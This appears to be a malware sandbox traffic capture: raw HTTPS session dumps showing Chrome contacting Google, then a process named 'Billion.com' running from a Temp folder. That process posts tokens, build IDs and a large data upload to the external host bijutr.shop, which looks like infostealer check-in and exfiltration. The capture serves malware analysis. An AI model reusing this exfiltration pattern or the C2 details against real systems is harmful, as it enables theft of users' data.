                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC372INData Raw: 32 61 38 63 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                                        Data Ascii: 2a8c)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                                        Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                                        Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                                        Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                                        Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 38 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61
                                                                                                                                                                                                                                                                                                        Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700283,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){va
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1390INData Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72
                                                                                                                                                                                                                                                                                                        Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC1390INData Raw: 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33
                                                                                                                                                                                                                                                                                                        Data Ascii: rn a.i;throw Error(\"F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC798INData Raw: 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                                        Data Ascii: 3d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC398INData Raw: 31 38 37 0d 0a 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 62 5b 31 5d 2c 64 5c 75 30 30 33 64 5f 2e 6d 65 28 61 2c 53 74 72 69 6e 67 28 62 5b 30 5d 29 29 3b 63 5c 75 30 30 32 36 5c 75 30 30 32 36 28 74 79 70 65 6f 66 20 63 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 63 29 3f 64 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 2e 6a 6f 69 6e 28 5c 22 20 5c 22 29 3a 5f 2e 6b 65 28 64 2c 63 29 29 3b 62 2e 6c 65 6e 67 74 68 5c 75 30 30 33 65 32 5c 75 30 30 32 36 5c 75 30 30 32 36 6e 65 28 61 2c 64 2c 62 29 3b 72 65 74 75 72 6e 20 64 7d 3b 6e 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63
                                                                                                                                                                                                                                                                                                        Data Ascii: 187const c\u003db[1],d\u003d_.me(a,String(b[0]));c\u0026\u0026(typeof c\u003d\u003d\u003d\"string\"?d.className\u003dc:Array.isArray(c)?d.className\u003dc.join(\" \"):_.ke(d,c));b.length\u003e2\u0026\u0026ne(a,d,b);return d};ne\u003dfunction(a,b,c){func


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        14192.168.2.649854142.250.181.68443320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:58 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Version: 705503573
                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:59 GMT
                                                                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        15192.168.2.649874188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:02 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----K6FKFKXLN7QQQI5PHDB1
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 505
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:02 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 36 46 4b 46 4b 58 4c 4e 37 51 51 51 49 35 50 48 44 42 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 46 4b 46 4b 58 4c 4e 37 51 51 51 49 35 50 48 44 42 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 46 4b 46 4b 58 4c 4e 37 51 51 51 49 35 50 48 44 42 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------K6FKFKXLN7QQQI5PHDB1Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------K6FKFKXLN7QQQI5PHDB1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------K6FKFKXLN7QQQI5PHDB1Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:03 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        16192.168.2.649877188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----QIWBS2NOP8YU3ECBA1V3
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 213453
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 49 57 42 53 32 4e 4f 50 38 59 55 33 45 43 42 41 31 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 51 49 57 42 53 32 4e 4f 50 38 59 55 33 45 43 42 41 31 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 49 57 42 53 32 4e 4f 50 38 59 55 33 45 43 42 41 31 56 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------QIWBS2NOP8YU3ECBA1V3Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------QIWBS2NOP8YU3ECBA1V3Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------QIWBS2NOP8YU3ECBA1V3Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
